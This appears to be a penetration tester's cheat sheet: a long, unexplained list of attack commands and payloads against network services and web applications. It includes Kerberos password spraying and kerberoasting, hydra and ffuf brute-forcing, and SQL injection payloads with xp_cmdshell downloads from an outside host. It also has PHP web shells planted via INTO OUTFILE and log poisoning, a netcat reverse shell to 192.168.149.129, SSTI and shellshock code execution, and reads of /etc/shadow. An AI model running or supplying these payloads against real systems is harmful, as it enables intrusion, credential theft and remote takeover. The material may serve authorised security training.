=> Commands
$ wget -m --no-passive ftp://anonymous:[email protected]
$ ftp 10.10.10.10 5581

=> Install
$ sudo apt install openssh-server

=> Commands
$ ssh [email protected]
$ ssh [email protected] -i id_rsa

=> Nmap


=> Service
$ sudo systemctl status ssh
$ sudo systemctl enable ssh
$ sudo systemctl start ssh

=> References
$ https://www.cyberciti.biz/faq/ubuntu-linux-install-openssh-server/

=> Nmap
$ 

=> Enum Users
$ smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 10.10.10.10

=> Swaks (Send Email)
$ swaks --to [email protected] --from [email protected] --header "Subject: Welcome" --body "Enjoy your stay!" --server 10.10.10.10

=> Install
$ sudo apt install dnsutils

=> Nmap
$ nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" 10.10.10.10

=> Nslookup
$ nslookup 10.10.10.10
	* server 10.10.10.10
	* 10.10.10.10
	
=> Dig
$ dig bank.local axfr @10.10.10.10

=> Host
$ host -t ns megacorpone.com

=> Install Apache2
$ sudo apt install apache2

=> Service
$ sudo systemctl status apache2
$ sudo systemctl enable apache2
$ sudo systemctl start apache2

=> References
$ https://www.digitalocean.com/community/tutorials/how-to-install-the-apache-web-server-on-ubuntu-20-04

=> Nmap


=> Enumerate Users
$ kerbrute userenum -d bank.local --dc 10.10.10.10 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

=> Bruteforce User
$ kerbrute bruteuser -d bank.local --dc 10.10.10.10 rockyou.txt nik

=> Passwword Spray
$ kerbrute passwordspray -d bank.local --dc 10.10.10.10 user.txt 'Password@123!'

=> Kerberoasting
$ GetUserSPNs.py bank.local/nik:'Password@123!' -dc-ip 10.10.10.10 -request -outputfile output.txt
$ 13100 hashcat mode

=> bloodhound-python
$ bloodhound-python -u 'nik' -p 'Password@123!' -d 'bank.local' -ns 10.10.10.10
$ bloodhound-python -u 'nik' --hashes 'aad3b435b51404eeaad3b435b51404ee:f220d3988deb3f516c73f40ee16c431d' -d 'bank.local' -ns 10.10.10.10

=> Nmap

=> Banner Grabbing
$ nc -nv 10.10.10.10 110
$ openssl s_client -connect 10.10.10.10:995 -crlf -quiet

=> Connect
$ telnet 10.10.10.10 110
	* USER nik
	* PASS Password@123!
	* list
	* retr 1
	* quit

=> Nmap

=> Rpcclient
$ rpcclient -U '' -N 10.10.10.10

=> Rpcclient Commands
$ enumdomusers
$ netshareenum
$ netshareenumall
$ srvinfo
$ queryuser 500
$ querydispinfo
$ enumdomains
$ enumprivs

=> Install
$ sudo apt install samba

=> Service
$ sudo systemctl status smbd
$ sudo systemctl start smbd
$ sudo systemctl stop smbd

=> Configuration file
$ /etc/samba/smb.conf
$ sudo smbpasswd -a username

=> Nmap
$ nmap --script "safe or smb-enum-*" -p 445 10.10.10.10
$ nmap --script smb-vuln* -p 137,139,445 10.10.10.10

=> Smbmap
$ smbmap -H 10.10.10.10
$ smbmap -H 10.10.10.10 -u raj -p 123 
$ smbmap -H 10.10.10.10 -P 139

=> Smbclient
$ smbclient -L 10.10.10.10
$ smbclient -N \\\\10.10.10.10\\Users -c "prompt OFF;recurse ON;mget *"
$ smbclient -N \\\\10.10.10.10\\Users -c "prompt OFF;recurse ON;ls"
$ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "prompt OFF;recurse ON;mget *" 'Password@123!'
$ smbclient -U 'nik' \\\\10.10.10.10\\Data -c "prompt OFF;recurse ON;ls" 'Password@123!'
$ smbclient -U 'nik' \\\\10.10.10.10\\Data -c  "get \Windows\test.txt" 'Password@123!' -t 10000

=> Smbget
$ smbget -R smb://10.10.10.10/users$/nik/nik.xml -U 'nik'

=> Crackmapexec
$ crackmapexec smb --gen-relay-list targets.txt 10.10.10.0/24
$ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -X whoami --amsi-bypass /tmp/amsiibypass
$ crackmapexec smb 10.10.10.10 -u 'nik' -p 'Password@123!' -x whoami 
$ crackmapexec smb 10.10.10.10 -u 'nik' -H hash_uniq.txt

=> Enum4linux
$ enum4linux 10.10.10.10
$ enum4linux -u "user" -p "password" -a 10.10.10.10
$ for i in $(cat list.txt); do enum4linux -a $i;done


=> References
$ https://ubuntu.com/tutorials/install-and-configure-samba

=> Nmap
$ nmap -sV --script imap-brute -p 143 10.10.10.10

=> Install
$ pip install snmpclitools
$ sudo apt-get install snmp-mibs-downloader

=> Snmp-check
$ snmp-check 10.10.10.10 -c public

=> Snmpwalk
$ snmpwalk -v1 -c public 10.10.10.10
$ snmpwalk -c public 10.10.10.10
$ snmpwalk -v1 -c public 10.10.10.10 1
$ snmpwalk -v1 -c public 10.10.10.10 2
$ snmpwalk -v 1 -c public 10.10.10.10 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
$ snmpwalk -m +MY-MIB -v 2c -c public 10.10.10.10 nsExtendObjects
$ snmpwalk -m +MY-MIB -v 1 -c public 10.10.10.10 nsExtendObjects
$ snmpwalk -m ALL -v 2c -c public 10.10.10.10 nsExtendObjects

=> Onesixtyone
$ onesixtyone -c /path/to/seclists/Discovery/SNMP/snmp-onesixtyone.txt -i ip.txt

=> Nmap
$ nmap -n-sU -p 623 10.10.10.10

=> Metasploit
$ use auxiliary/scanner/ipmi/ipmi_cipher_zero
$ use auxiliary/scanner/ipmi/ipmi_version

=> Authentication Bypass Cipher 0
$ ipmitool -I lanplus -C 0 -H 10.10.10.10 -U Username -P Password user list

=> Default Credentials
Administrator:<8 character string>
admin:admin
root:calvin
root:changeme
ADMIN:ADMIN

=> References
$ https://book.hacktricks.xyz/pentesting/623-udp-ipmi
$ https://www.tzulo.com/crm/knowledgebase/47/IPMI-and-IPMITOOL-Cheat-sheet.html

=> Nmap
$ nmap -n -sV --script "ldap* and not brute" 10.10.10.10

=> LdapSearch
$ ldapsearch -h 10.10.10.10 -x -b 'DC=bank,DC=local' -s sub
$ ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)'
$ ldapsearch -x -h 10.10.10.10 -D 'BANK\nik' -w 'Password@123!' -b 'CN=Users,DC=bank,DC=local'
$ ldapsearch -x -h 10.10.10.10 -D '[email protected]' -w 'Password@123!' -b 'CN=Users,DC=bank,DC=local'
$ ldapsearch -x -h 10.10.10.10 -D '[email protected]' -w 'Password@123!' -b 'CN=Users,DC=bank,DC=local' | grep -i <user> -C 40
$ ldapsearch -x -h 10.10.10.10 -D '[email protected]' -w 'Password@123!' -b 'DC=bank,DC=local' "(userAccountControl:1.2.840.113556.1.4.803:=524288)" samaccountname

=> Ldap Queries
=> find domain computers not dc
$ ([adsisearcher]"(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))").findall()

=>  find domain controllers
$ ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").findall()

=> find all domain users
$ ([adsisearcher]"(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))").findall()

=> Get samaccountname
$ ([adsisearcher]"(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))").findall().Properties.samaccountname

=> Nmap
$ nmap -sV --script "rsync-list-modules" -p 873 10.10.10.10

=> Command
$ rsync -av --list-only rsync://10.10.10.10/Modules
$ rsync -av rsync://10.10.10.101/Conf ./shared
$ rsync -av ./test.txt rsync://10.10.10.10/Modules/test.txt

=> References
$ https://book.hacktricks.xyz/pentesting/873-pentesting-rsync

=> Nmap
$ nmap -sV --script=nfs-showmount <target>

=> Showmount
$ showmount -e 10.10.10.10

=> Mount
$ mount -t nfs 10.10.10.10:/home mnt
$ mount -o vers=3 -t nfs 10.10.10.10:/home mnt

=> Ffuf
$ ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -x http://10.10.10.10:3128

=> proxychains
$ echo "http 10.10.10.10 3128" >> /etc/proxychains.conf
	* proxychains ssh [email protected]

=> Commands
$ mysql -u root -p -h 10.10.10.10
$ mysql -u root -pPassword123 -e "use drupal;select * from users"

=> Bruteforce
$ hydra -l nik -p password.txt 10.10.10.10 mysql -t 30 -f

=> Check UDF
$ select * from msql.func;

=> Mysql Commands
$ select sys_exec('whoami');

=> Nmap
$ nmap -p 3389 --script=rdp-vuln-* 10.10.10.10

=> Commands
$ xfreerdp /u:nik /p:'Password@123!' /cert:ignore /v:10.10.10.10
$ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.10.10 /drive:share_mount,/opt/folder_to_mount
$ rdesktop -a 16 -z -u admin -p password 10.10.10.10
$ rdesktop -f -u "" 10.10.10.10

=> References
$ https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

=> Nmap
$ nmap -p 3632 10.10.10.10 --script distcc-exec --script-args="distcc-exec.cmd='id'"

=> Install
$ sudo apt-get install redis-tools

=> Commands
$ redis-cli -h 10.10.10.10
	* keys *
	* get pk:ids:User
	* info
	* client list
	* CONFIG GET *
$ redis-cli -h 10.10.10.10 -p 6379 eval "dofile('//10.10.11.1//share')" 0
$ redis-cli -h 10.10.10.10 -p 6379 eval "dofile('/etc/passwd')" 0

=> redis-dump-go
$ https://github-com.translate.goog/yannh/redis-dump-go

=> Downloads
$ https://download.redis.io/releases/

=> References
$ https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

=> User Enumeration
$ http://127.0.0.1:8086/debug/requests

=> Usage
$ curl -G "http://10.10.10.10:8086/query?pretty=true" -H "Authorization: Bearer <JWT>"  --data-urlencode "q=show databases"
$ curl -G "http://10.10.10.10:8086/query?pretty=true" -H "Authorization: Bearer <JWT>" --data-urlencode "db=database" --data-urlencode "q=select * from \"tables\""
$ curl -G "http://10.10.133.227:8086/query?pretty=true" -H "Authorization: Bearer <JWT>" --data-urlencode "db=database" --data-urlencode "q=select * from times" --data-urlencode "epoch=s"

=> Commands
$ show databases
$ show measurements
$ show users
$ select * from tables

=> References
$ https://www.komodosec.com/post/when-all-else-fails-find-a-0-day
$ https://docs.influxdata.com/influxdb/v1.8/administration/authentication_and_authorization/

=> Commands
$ mongo localhost:27017/myplace -u nik -p Password123
	* show dbs
	* use <db>
	* show collections
	* db.<collection found>.find()
	* db.<collection found>.insert( { _id: 1, cmd: "curl 10.10.14.4/test"} )

# Download/Install
https://github.com/zu1k/nali
go get -u -v github.com/zu1k/nali

# Usage
echo 6.6.6.6 | nali
nali 1.2.3.4
nali 1.2.3.4 4.3.2.1 123.23.3.0
nslookup nali.lgf.im 8.8.8.8 | nali
nslookup google.com | nali

=> Commands
$ knocker.py -p 8890,7000,666 10.10.10.10
$ for i in 571 290 911;do nmap -n -v0 -Pn --max-retries 0 -p $i 10.10.10.10;done
$ knock 10.10.10.10 7000:666:8890

=> Permutation (Port)
$ python -c 'import itertools; print list(itertools.permutations(\[8890,7000,666\]))' | sed 's/), /\\n/g' | tr -cd '0-9,\\n' | sort | uniq > permutation.txt

# No netstat or lsof
$ declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done
$ declare -a array=($(tail -n +2 /proc/net/tcp | cut -d":" -f"3"|cut -d" " -f"1")) && for port in ${array[@]}; do echo $((0x$port)); done | sort | uniq
$ https://www.commandlinefu.com/commands/view/15313/check-open-ports-without-netstat-or-lsof

# Another Port Scanning
$ for i in {1..65535};do (echo < /dev/tcp/127.0.0.1/$i) &>/dev/null && printf "\n[+] Open Port at\n: \t%d\n" "$i" || printf "."; done

# Commands
$ curl -XGET -G -b 'PHPSESSID=cnc4ofdvpm1770nodu7lcbte46' 'http://localhost/tracks.php' --data-urlencode "id=9999 union select 1,database(),3-- -"

# Install
easy_install shodan

# Commands
shodan init "<API_KEY"
shodan domain example.com

[MYSQL]
=> Get Current Database
$ database()

=> Get Database
$ UNION SELECT table_schema FROM information_schema.tables

=> Get Table Name
$ UNION SELECT table_name FROM information_schema.tables WHERE table_schema == "database"

=> Get Column Name
$ UNION SELECT table_name, column_name FROM information_schema.columns

=> ===Time Based===
=> Get Database
$ (SELECT sleep(5) from dual where substring(database(),1,1)='h') 
$ (SELECT sleep(5) from dual where substring(database(),2,1)='h') 

=> Get Tables
$ (SELECT sleep(5) from information_schema.tables where table_name LIKE '%hotel%')

=> Get Columns
$ (SELECT sleep(5) from information_schema.columns where column_name LIKE '%room%' AND table_name='hotel')

=> Extract
$ IF((select MID(user,1,1) from mysql.user limit 0,1)='D' , sleep(5),0)

=> Extra
$ (select IF(500>1000, "nothing", sleep(5)))

=> ===Union Based===
=> Get Database
$ 9999 union select 1,database(),3,4,5

=> Get Tables
$ 9999 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema like "%hotel%"

=> Get Columns
$ 9999 union select 1, group_concat(column_name),3,4,5 from information_schema.columns where table_name like "%room%" 

=> Extract
$ 9999 union select 1,group_concat(user,":",password),3,4,5 from mysql.user

=> ===Blind===
[WHERE]
$ ' and password like 'k%'--

=> Write File
$ Set Global General_Log_File = '/tmp/test.php';
$ Select '<?php system($_GET[]); ?>';
$ select '<?php system($_GET["cmd"]); ?>' into outfile 'C:/xampp/htdocs/shell4.php' 

=> Read File
$ load_file("/etc/passwd");

[ORACLE]
=> Get Current Database
$ union SELECT SYS.DATABASE_NAME,'b',1 FROM v$version--

=> Get All Tables
$ ' union SELECT table_name,'b',1 FROM all_tables--

=> Get Columns
$ ' union SELECT column_name,'b',1 FROM all_tab_columns WHERE table_name = 'TABLE'--

=> Extract
$ ' union SELECT USERNAME,'b',1 FROM TABLE--
$ ' union SELECT USERNAME||':'||PASSWORD,'',1 FROM TABLE--

[MSSQL]
=> Payload (Encounter Before)
$ A';waitfor delay '0:0:00';--
$ ' OR 1=1 OR 'A' LIKE 'A
$ ';EXEC master..xp_cmdshell 'powershell.exe -c curl http://10.10.10.10/';--
$ ';EXEC master..xp_cmdshell 'powershell.exe -c iwr http://10.10.10.10/';--

=> Check File exist  or Not
=> Corect Path
$ ';DECLARE @isExists INT ;EXEC xp_fileexist 'C:\windows\win.ini', @isExists OUT Select @isExists;IF(@isExists=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;--

=> Wrong Path
$ ';DECLARE @isExists INT ;EXEC xp_fileexist 'C:\windows\win2.ini', @isExists OUT Select @isExists;IF(@isExists=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;--

=> Check Directory/Files Exist Or Not
=> Correct
$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'IF EXIST "C:\windows\" (Exit 1) ELSE (Exit 0)',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;--

=> Wrong
$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'IF EXIST "C:\windows2\" (Exit 1) ELSE (Exit 0)',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;--

=> Check Hostname
$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((hostname)[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 

=> Check APPDATA Path
$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(($env:APPDATA[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 

=> Check Substring 
=> Correct
$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((Get-ChildItem -Path C:\ -Force -Directory)[0].fullName[0] -eq [char]67)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 

=> Wrong
$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(((Get-ChildItem -Path C:\ -Force -Directory)[0].fullName[0] -eq [char]66)){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 

=> Powershell IF ELSE
$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF ("1" -eq "1") {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 

$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF (1 -eq 1) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 

$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF (echo 1) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 

$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c IF ( Test-Path C:\ ) {EXIT 1} ELSE {EXIT 0}',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;--  

$ ';DECLARE @rc INT;EXEC @rc=master..xp_cmdshell 'powershell.exe -c "IF(Get-ChildItem -Path C:\){EXIT 1} ELSE {EXIT 2}"',no_output;IF(@rc=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;-- 


=> Simple IF ELSE
$ ';DECLARE @value INT = 1;IF(@value=1) WAITFOR DELAY '0:0:10' ELSE WAITFOR DELAY '0:0:0' ;--

=> Payload (Enable xp_cmdshell)
$ ';sp_configure 'show advanced options', '1';RECONFIGURE;--
$ ';sp_configure 'xp_cmdshell', '1';RECONFIGURE;--

=> Time Based
$ ;waitfor delay '0:0:10'--
$ );waitfor delay '0:0:10'--
$ ';waitfor delay '0:0:10'--
$ ');waitfor delay '0:0:10'--
$ ));waitfor delay '0:0:10'--

=> References
$ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
$ https://www.sqlservercentral.com/forums/topic/determining-whether-a-directory-exists-xp_dirtree-xp_subdirs

[SQLITE]
=> Command
$ sqlite3 databse.db
$ .tables
$ select * from user;
$ .schema user
$ UPDATE user SET passwd = "" where id 2;

# Introspection
{"query":"{\r\n      __schema {\r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }"}

# Query
{"query":"{\r\n    AllNotes\r\n   {\r\n   id,author,title\r\n   }\r\n   }"}

# References
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
https://apis.guru/graphql-voyager/

=> Export Proxy
export HYDRA_PROXY=connect://127.0.0.1:8080

=> Install
sudo apt-get install hydra-gtk

=> Commands
hydra -l nik -p rockyou.txt 10.10.10.10 ssh -t 30 -f
hydra -L user.txt -P pass.txt 10.10.10.10 ssh -t 30 -f
hydra -L user.txt -P pass.txt 10.10.10.10 ssh -s 2222 -t 30 -f

=> Json
hydra -l admin -P rockyou.txt localhost http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^","recaptcha"\:""}:Forbidden' -V -f

=> Json (Bypass WAF - User agent Hydra)
hydra -l admin -P rockyou.txt localhost http-post-form '/api/login:{"username"\:"^USER^","password"\:"^PASS^"}:H=User-Agent\: Mozilla/5.0:H=Content-Type\: application/json:F=Wrong credentials' -V -f

=> POST
hydra -l admin -P rockyou.txt 10.10.10.10 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"

=> GET
hydra -l user -P rockyou.txt 10.10.10.10 http-get / 

# Download
https://github.com/Jake-Ruston/JSONBrute

#Example 1
python3 jsonbrute.py --url http://localhost/v2/login --wordlist rockyou.txt --data "username=user, password=FUZZ" --code 200

#Example 2
python3 jsonbrute.py --url http://localhost/api/login --wordlist rockyou.txt --data "username=admin, password=FUZZ, recaptcha= " --code 200 --verbose

#PROXY (-p)
wfuzz -u http://localhost/authenticate -w test.txt -d "uname=admin&psw=FUZZ&remember=on" -p 127.0.0.1:8080 -H "Referer: http://localhost/authenticate"

#COOKIES (-b)
wfuzz -u http://localhost/admin/FUZZ.php -w big.txt -b PHPSESSID=1e28or9cmi6ua05d78tov7j7t4 --hc 404

#POST & output in url (/?login=username_incorrect)
wfuzz -u http://localhost/login -w users.txt -w pass.txt -d "username=FUZZ&password=FUZ2Z"

# Commands

# Subdomain/Vhost
gobuster vhost -r --url http://bank.local/ --wordlist subdomains-top1million-110000.txt -t 50
gobuster vhost -k -r --url https://bank.local/ --wordlist subdomains-top1million-110000.txt -t 50

# Commands
vault kv list ssh/roles/
vault kv get secret/creds
vault kv put secret/creds passcode=my-long-passcode
vault ssh -mode=otp -role=my-role root@localhost

# References
https://www.vaultproject.io/
https://www.vaultproject.io/docs/commands/ssh

# Install

# Commands
ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -e .php,.html,.txt,.bak -t 50
ffuf -u 'https://FUZZ.bank.local' -w subdomains-top1million-20000.txt:FUZZ -t 30
ffuf -u 'http://10.10.10.10/' -w sqli.txt:FUZZ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=FUZZ" -fc 200
ffuf -u 'https://10.10.10.10/FUZZ' -w common.txt:FUZZ -e .txt -t 1 -fs 1508 -fl 4

# Subomdina/Vhost
ffuf -ic -c -u "http://bank.local/" -H "Host: FUZZ.bank.local" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -fc 301

# POST Method
ffuf -u 'http://10.10.10.10/main/wp-login.php' -w user.txt:USER -w pass.txt:PASS -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "log=USER&pwd=PASS&wp-submit=Log+In"
ffuf -u 'http://10.10.10.10/login.php' -w user.txt:FUZZ -w pass.txt:FUZ2Z -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user=FUZZ&pass=FUZ2Z" --fc 200
ffuf -u 'http:/10.10.10.10/login.php' -w user.txt:FUZZ -w pass.txt:FUZ2Z -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user=FUZZ&pass=FUZ2Z"

# With Cookie
ffuf -u "http://10.10.10.10/FUZZ" -w common.txt:FUZZ -t 1 -b "cookie1=asdasdasd;cookie2=asdasdasd"

# Timeout
ffuf -u "http://10.10.10.10/FUZZ" -w common.txtt:FUZZ -e .txt,.html -t 1 -timeout 40 -fs 200

# With proxy
ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -t 30 -e .php,.html,.txt -x http://10.10.10.10:3128

Change content-type
    * text/html
	* image/gif
	* image/jpeg
extension
    * .png.php
    * .php.png
    * .php%00.png
	* .phtml
	
# Php content
<?php system($_GET['cmd']);?>

# References
-> https://book.hacktricks.xyz/pentesting-web/file-inclusion

===PHP Wrapper===
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php

=======Linux======
# Wordlists
/var/log/mail.log
/etc/passwd
/etc/ldap.secret
/etc/shadow
/etc/hosts
/etc/knockd.conf
/etc/exports
/proc/<PID>/cmdline

=======LFI To RCE========
#-----[/var/log/mail.log]-----
nc 10.10.10.10 25

HELO test
MAIL FROM: "test <?php system($_GET['cmd']);?>"
RCPT TO: root
DATA
.
#RCE
?page=/var/log/mail&cmd=ls -la

#-----[/var/log/apache2/access.log]-----
curl http://10.10.10.10 -A '<?php system($_GET["cmd"]); ?>'

#RCE
?book=../../../../../../var/log/apache2/access.log&cmd=ls -la

#-----[/var/mail/USER]-----
nc 10.10.10.10 25

HELO test
MAIL FROM: www-data@solstice
RCPT TO:www-data@solstice
DATA
<?php system($_GET["cmd"]); ?>
.
#RCE
?book=../../../../../../var/mail/www-data&cmd=ls -la

======Windows======
# Wordlists
C:/windows/win.ini
C:/windows/system.ini
C:/windows/bootstat.dat
C:/Program Files/Windows NT/Accessories/WordpadFilter.dll
C:/Program Files/Common Files/mirosoft shared/Web Server Extensions/<Number 1-20>/BIN/FPWEC.DLL
C:/Program Files/Exchsrvr/MDBDATA/Privi.edb
C:/inetpub/wwwroot/iisstart.htm
C:/windows/Microsoft.NET/Framework64/<version v4.0.30319>/vbc.exe.config
C:/windows/Microsoft.NET/Framework64/<version v4.0.30319>/Config/web.config
C:/windows/System32/drivers/etc/hosts
C:/windows/System32/drivers/acpi.sys
C:/windows/System32/drivers/etc/networks
C:/Users/<user>/Desktop/Desktop.ini
C:/windows/debug/NetSetup.log
C:/windows/debug/mrt.log
C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml

# Refrences (Windows Wordlists)
- https://github.com/random-robbie/bruteforce-lists/blob/master/windows-lfi.txt

# ASP.Net 
../../web.config
../../Images/image.jpg
../../packages.config
../../Global.asax
../../Views/web.config
../../Content/bootstrap_dropdown.css
../../Content/Site.css
../../Views/_ViewStart.cshtml
../../Views/_ViewStart.aspx
../../Views/_ViewStart.ascx
../../Views/Shared/Error.cshtml
../../Views/Shared/Error.aspx
../../Views/Shared/Error.ascx
../../Views/Home/Index.cshtml
../../Views/Home/Index.aspx
../../Views/Home/Index.ascx
../../bin/<namespace found>.dll

# Grep Use in web.config
grep -Ri namespace | grep -v namespaces | cut -d'"' -f 1-2
grep -Ri assemblyidentity | cut -d'"' -f 1-2
grep -ri " type=" | grep -v compiler | cut -d'"' -f 1-4

# References (ASP.Net)
- https://digi.ninja/blog/when_all_you_can_do_is_read.php
- https://www.c-sharpcorner.com/UploadFile/3d39b4/folder-structure-of-Asp-Net-mvc-project/
- https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html
- https://raw.githubusercontent.com/xajkep/wordlists/master/discovery/asp_files_only.txt
- http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html

# ASP.NET MVC Folder Structure
MyFirstProject
- Properties
	- AssemblyInfo.cs
- App_Data
	- 
- App_Start
	-
- Content
	- Site.css
- Controllers
	- 
- fonts
	-
- Models
	- 
- Scripts
	- something.js
- Views
	- Index.cshtml/Index.aspx/Index.ascx
	- web.config
- bin
	- something.dll
- Images
	- 
- favicon.ico
- Global.asax
- packages.config
- web.config

# References
- https://www.tutorialsteacher.com/mvc/mvc-folder-structure
- https://github.com/DLarsen/Learn-ASP.NET-MVC

# Payload Command Execution
'$(nc -e /bin/bash 192.168.149.129 4444)'
"$(printf 'aaa\n/bin/sh\nls')"
() { :;}; /bin/bash

# Date
%H:%M:%S';cat ../flag;#
%H';date -f '../flag
%H' -f '../flag

=> References
$ https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

=> Nunjucks
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}

=> Look at robots.txt
=> Check javascript (urls,endpoints)
=> Check parameter (functionality -> role,modified)
=> URL-based (403 bypass)
	-> X-Original-URL : /admin/deleteUser
	-> X-Rewrite-URL : /admin/deleteUser
=> Try every Method (403 bypass)
=> IDOR
=> Check other user ID (unpredictable)
=> Check response before redirect
=> Check every step of functionality (multi-step) if its affected with broken access control.
=> Referer-based (Add Referer Header)

=> References
$ https://portswigger.net/web-security/access-control
$ https://infosecwriteups.com/begineers-crash-course-for-finding-access-control-vulnerabilities-in-the-web-apps-part-1-5b61cf4396c4
$ https://infosecwriteups.com/begineers-crash-course-for-finding-access-control-vulnerabilities-in-the-web-apps-part-2-ce38eabfb81a

socat tcp-listen:8009,fork tcp:192.168.56.104:8009 &
socat tcp-listen:8080,fork tcp:192.168.56.104:8080 &
socat tcp-listen:34483,fork tcp:192.168.56.104:34483 &
socat tcp-listen:4321,fork tcp:192.168.56.104:4321 &

=> Install
$ pip install PyJWT

=> Commands
$ import jwt
$ encoded = jwt.encode({"username": "o5yY6yya", "exp" : 1690896507}, "", algorithm="HS256")
$ encoded

=> References
$ https://github.com/jpadilla/pyjwt
$ https://www.epochconverter.com/

# Command
tcpdump -i lo -w /tmp/write.pcap

# Chisel
https://github.com/jpillora/chisel

## Client Machine
./chisel client 10.66.67.154:8000 R:25:127.0.0.1:25
